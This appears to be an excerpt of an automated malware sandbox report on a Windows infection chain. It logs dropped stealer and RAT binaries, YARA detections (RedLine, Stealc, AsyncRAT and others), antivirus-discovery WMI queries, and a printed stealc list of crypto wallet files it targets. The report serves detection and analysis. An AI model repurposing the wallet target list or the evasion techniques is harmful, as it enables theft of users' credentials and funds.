Source: explorer.exe, 00000020.00000002.2516624314.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000020.00000000.1995499829.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: axplong.exe, axplong.exe, 00000011.00000002.2507204359.00000000007B3000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: C3Program Manager
Source: wxfM3haI2K.exe, 0000001A.00000002.1943505648.0000000003459000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 17_2_005DD312 cpuid

17_2_005DD312

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	25_2_0041E815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	25_2_00414128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	25_2_0041EA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	25_2_0041EB91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	25_2_0041E402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	25_2_0041EC97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	25_2_0041ED66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	25_2_0041E5FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	25_2_0041464E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	25_2_0041E6EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	25_2_0041E6A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	25_2_0041E78A

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000192001\whiteheroin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000192001\whiteheroin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Queries volume information: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Users\user\AppData\Roaming\XBckuYbXje.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 17_2_005DCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

17_2_005DCB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 17_2_005C65B0 LookupAccountNameA,

17_2_005C65B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 38.0.XClient_protected.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: XClient_protected.exe PID: 6224, type: MEMORYSTR

Source: XClient_protected.exe, 00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp, XClient_protected[1].exe.17.dr	Binary or memory string: MSASCui.exe
Source: RegAsm.exe, 00000014.00000002.2100304244.0000000005DCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: XClient_protected.exe, 00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp, XClient_protected[1].exe.17.dr	Binary or memory string: procexp.exe
Source: XClient_protected.exe, 00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp, XClient_protected[1].exe.17.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 5.2.axplong.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.axplong.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PQ2AUndsdb.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.1283323218.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1298815760.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1848639136.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1257937192.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1323636516.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2505348134.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 5108, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 26.0.wxfM3haI2K.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.1926189866.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1924581251.0000000000E82000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 28.0.XBckuYbXje.exe.740000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.GOLD.exe.34d5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.GOLD.exe.34d5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.1925538885.0000000000742000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1885204503.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GOLD.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wxfM3haI2K.exe PID: 1456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XBckuYbXje.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 0000001E.00000002.2041375073.00000000008B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2041318163.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2538762499.0000000008871000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000001F.00000002.2156458487.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 1848, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 1848, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 26.0.wxfM3haI2K.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 0000001F.00000002.2156458487.000000000114D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000014.00000002.2071814033.0000000002C19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
